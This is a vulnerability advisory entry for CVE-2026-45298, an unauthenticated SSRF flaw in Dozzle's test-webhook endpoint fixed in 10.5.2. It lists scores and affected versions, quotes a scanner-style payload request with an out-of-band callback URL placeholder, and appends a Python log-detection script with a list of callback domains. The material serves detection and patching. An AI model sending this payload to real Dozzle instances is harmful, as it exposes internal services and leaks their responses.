cbcvebase.
CVE-2026-45298
published 2026-05-26


Priority: P265 high
CVSS 3.1: 8.6 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
EXPLOIT
EPSS: 1.49% (70.9th percentile)
Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2.

Affected

3 ranges

Vendor          Product         Version range   Fixed in
amir20          dozzle          < 10.5.2        10.5.2
amirraminfard   dozzle          < 10.5.2        10.5.2
github.com      amir20_dozzle   0 – 8.14.12     (none listed)

Detection & IOCs (extracted from sources)

url: POST /api/notifications/test-webhook
command: POST /api/notifications/test-webhook HTTP/1.1 Content-Type: application/json {"url":"http://{{interactsh-url}}","headers":{}}
  • The vulnerable endpoint POST /api/notifications/test-webhook is unauthenticated in default Dozzle deployments (no DOZZLE_AUTH_PROVIDER set). Monitor for unexpected POST requests to this path from external/untrusted sources.
  • The SSRF payload is delivered as a JSON body with a 'url' key and optional 'headers' key. Inspect POST bodies to /api/notifications/test-webhook for attacker-controlled URLs pointing to internal resources or out-of-band callback hosts.
  • On non-2xx responses from the target, the server returns up to 1MB of the response body to the caller — monitor for large response bodies from this endpoint as a sign of active SSRF data exfiltration.
  • Nuclei template matches on HTTP interaction protocol hit on interactsh and response body containing '"statusCode":200' with HTTP 200 status — use these as detection signals in proxy/WAF logs.
  • The vulnerability only affects default Dozzle deployments where DOZZLE_AUTH_PROVIDER is not configured. Deployments with an auth provider set may not expose the endpoint unauthenticated.
  • The fix is present in Dozzle version 10.5.2 and later. Versions prior to 10.5.2 are affected.
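One way to turn the detection notes above into a log check, as an added example (not code from the CVE record or from the Dozzle project). The log-entry layout, the callback-domain list and the 64 KB size threshold are assumptions:

```python
# Added example (not part of the CVE record or of the Dozzle project): flag requests to the
# unauthenticated test-webhook endpoint whose JSON "url" points at an internal address or an
# out-of-band callback host, and unusually large relayed replies, per the detection notes.
import ipaddress, json
from urllib.parse import urlsplit

TARGET_PATH = "/api/notifications/test-webhook"
# Callback-service domains treated as out-of-band indicators (assumed list, extend as needed).
OOB_SUFFIXES = ("interact.sh", "oast.fun", "oast.pro", "oast.live", "oast.site", "oast.me")

def classify_url(url):
    """Return a reason string if the webhook URL looks suspicious, else None."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return "unparseable-url"
    if not host:
        return "missing-host"
    if host == "localhost" or host.endswith(OOB_SUFFIXES) or "{{" in host:
        return "oob-or-loopback-host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # ordinary public hostname; not flagged on its own
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return f"internal-address:{ip}"
    return None

def detect(entries):
    """Yield (client, reason); each entry is a dict with method, path, client, body, resp_bytes."""
    for e in entries:
        if e["method"] != "POST" or e["path"] != TARGET_PATH:
            continue
        try:
            body = json.loads(e.get("body") or "{}")
        except json.JSONDecodeError:
            yield e["client"], "malformed-json-body"
            continue
        reason = classify_url(str(body.get("url", "")))
        # The up-to-1MB non-2xx relay is the exfiltration signal; 64 KB is an assumed threshold.
        if reason is None and e.get("resp_bytes", 0) > 64 * 1024:
            reason = "large-relayed-body"
        if reason:
            yield e["client"], reason

# Constructed sample log entries (not real traffic).
SAMPLE = [
    {"method": "POST", "path": TARGET_PATH, "client": "203.0.113.7", "resp_bytes": 180, "body": '{"url":"http://192.168.1.10/","headers":{}}'},
    {"method": "POST", "path": TARGET_PATH, "client": "203.0.113.9", "resp_bytes": 90, "body": '{"url":"http://abc123.oast.fun","headers":{}}'},
    {"method": "POST", "path": TARGET_PATH, "client": "10.0.0.5", "resp_bytes": 120, "body": '{"url":"https://hooks.example.com/dozzle","headers":{}}'},
    {"method": "GET", "path": "/api/containers", "client": "10.0.0.5", "resp_bytes": 5000, "body": ""},
]
```

Run `list(detect(SAMPLE))` to see the two flagged entries; an upgrade to 10.5.2 or setting DOZZLE_AUTH_PROVIDER remains the actual fix.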